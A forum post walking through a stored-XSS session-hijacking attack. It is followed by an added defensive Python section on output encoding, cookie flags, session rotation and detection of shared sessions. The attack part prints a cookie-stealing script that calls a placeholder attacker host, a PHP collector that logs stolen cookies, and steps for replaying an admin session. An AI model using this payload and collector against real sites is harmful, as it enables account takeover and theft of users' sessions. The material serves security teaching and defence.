Overview Session Hijacking

ethical hacker
Posts: 62
Joined: Thu Feb 29, 2024 10:48 pm

Postby ethical hacker » Tue Mar 12, 2024 12:13 am

The Session Hijacking assault entails the compromise of a session token through the illicit acquisition or prediction of a legitimate session token, thereby enabling unauthorised entry into the authenticated sections of a web application.

By way of illustration, let us consider a standard web application login page. Through this login interface, both regular users and administrative users can gain access to the application.
The web application offers identical functionality to both user categories, ensuring that what is visible to a regular user mirrors what an administrator perceives. The primary aim of this post is to exemplify the practical execution of session hijacking. Consequently, we shall proceed to delve deeper into the application to identify vulnerabilities that will aid us in achieving our objective.

1.- Solely one function is accessible to all users, namely "Enter your data"; hence, let us proceed to examine this feature. Upon utilising this function, it becomes apparent that any data input is retained by the web application and subsequently displayed on the screen through the "Show data" feature. This scenario presents a potential vulnerability to stored XSS exploitation.
2.- To assess the vulnerability of the web application, we shall inject "><xss>" and scrutinise the source via "Show Data". Evidently, the web application fails to filter HTML special characters, rendering it susceptible to stored cross-site scripting attacks.
3.- We can now formulate a strategy to execute a session hijacking attack on this web application, with the objective of gaining access to the administrative panel of the application.
4.- By injecting

<script>var a=new Image();a.src="http://theattackerIPaddress/stealer.php?cmd="+document.cookie</script>

into the data input field, we can anticipate the moment when the admin user views the entered data, thereby enabling us to acquire their session cookie. The script "stealer.php" residing on the attacker's IP address contains the subsequent code:
<?php
// Writes whatever arrives in the "cmd" request parameter to stolen.txt
if (isset($_REQUEST["cmd"]))
{
    $f = fopen("stolen.txt", "w+");
    fwrite($f, $_REQUEST["cmd"] . "<br>");
    fclose($f);
}
5.- Subsequently, we inject the script mentioned above into the data entry field and await the moment when the admin user reviews the inputted data. Upon the admin user's interaction with the displayed data, the attacker will receive the following information in "stolen.txt" located on their attacking IP address:
PHPSESSID=aamckhi9852n76lsdp10bher41<br>
6.- Presently, we can employ Burp Suite to utilise this session for accessing the admin panel. By intercepting the request and incorporating the pilfered session cookie, we can manipulate the request accordingly. Upon forwarding this modified request, we effectively hijack the admin user's session.
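The post shows the attack chain; the following is an added example (not from the original post or the application it describes) of the defender-side counterparts: output-encoding the stored data so the injected tag in step 2 never becomes markup, issuing the session cookie with HttpOnly/Secure/SameSite so that document.cookie exposes nothing to script, rotating the session ID on login, and a small detection routine that flags a session ID presented from more than one client profile, as a hijacked cookie would be. The cookie name PHPSESSID is taken from the post; the access-log format "client_ip session_id user_agent" and the log lines themselves are constructed for the example and do not correspond to any real server's format.

```python
"""Defensive counterpart to the stored-XSS session hijack described above.

Added example, not part of the original post. Assumptions: a PHP-style
session cookie named PHPSESSID, and a constructed access-log format
"client_ip session_id user_agent" (a placeholder, not any real server's).
"""
import html
import secrets
from collections import defaultdict
from http.cookies import SimpleCookie

# Constructed sample: the payload shape from step 4, with a placeholder host.
SAMPLE_INPUT = ('<script>var a=new Image();'
                'a.src="http://ATTACKER-HOST-PLACEHOLDER/stealer.php?cmd="+document.cookie'
                '</script>')


def render_stored_data(raw: str) -> str:
    """Output-encode stored user data before it is placed in an HTML body.

    This is the missing filtering noted in step 2: the browser receives
    &lt;script&gt; as text, never as a tag, so "Show data" cannot execute it.
    """
    return html.escape(raw, quote=True)


def is_inert(rendered: str) -> bool:
    """True when no raw tag delimiters or quote characters survive encoding."""
    return not any(ch in rendered for ch in '<>"\'')


def session_cookie_header(session_id: str) -> str:
    """Build the Set-Cookie value for the session cookie.

    HttpOnly is what defeats the stealer in step 4: document.cookie no
    longer includes the session ID, so the image request carries nothing.
    Secure keeps it off plaintext HTTP; SameSite=Lax limits cross-site sends.
    """
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["httponly"] = True
    c["PHPSESSID"]["secure"] = True
    c["PHPSESSID"]["samesite"] = "Lax"
    c["PHPSESSID"]["path"] = "/"
    return c.output(header="").strip()


def rotate_session(old_id: str) -> str:
    """Issue a fresh, unpredictable session ID on privilege change (login).

    A token captured before authentication is then worthless afterwards.
    """
    new_id = secrets.token_urlsafe(32)
    return new_id if new_id != old_id else rotate_session(old_id)


# Constructed access-log lines in the assumed "client_ip session_id user_agent"
# layout. The session ID is the one shown in step 5 of the post.
SAMPLE_LOG = """\
203.0.113.10 aamckhi9852n76lsdp10bher41 Mozilla/5.0 (Windows NT 10.0) Firefox/123.0
203.0.113.10 aamckhi9852n76lsdp10bher41 Mozilla/5.0 (Windows NT 10.0) Firefox/123.0
198.51.100.7 aamckhi9852n76lsdp10bher41 python-requests/2.31
203.0.113.22 q1w2e3r4t5y6u7i8o9p0 Mozilla/5.0 (X11; Linux x86_64) Chrome/122.0
"""


def find_shared_sessions(log_text: str) -> dict:
    """Detection: map each session ID to the set of (ip, user_agent) pairs
    that presented it. A session seen from more than one client profile is
    the footprint of the replay in step 6 and is worth an alert."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, sid, ua = line.split(" ", 2)
        seen[sid].add((ip, ua))
    return {sid: clients for sid, clients in seen.items() if len(clients) > 1}


if __name__ == "__main__":
    print(render_stored_data(SAMPLE_INPUT))
    print(session_cookie_header(rotate_session("old-session-id")))
    print(find_shared_sessions(SAMPLE_LOG))
```

The detection heuristic is deliberately coarse: a legitimate user changing networks will also trip it, so in practice it is an enrichment signal to correlate with login events and IP reputation rather than a blocking rule. The encoding function assumes the data lands in an HTML body context; attribute, URL and JavaScript contexts need their own encoders.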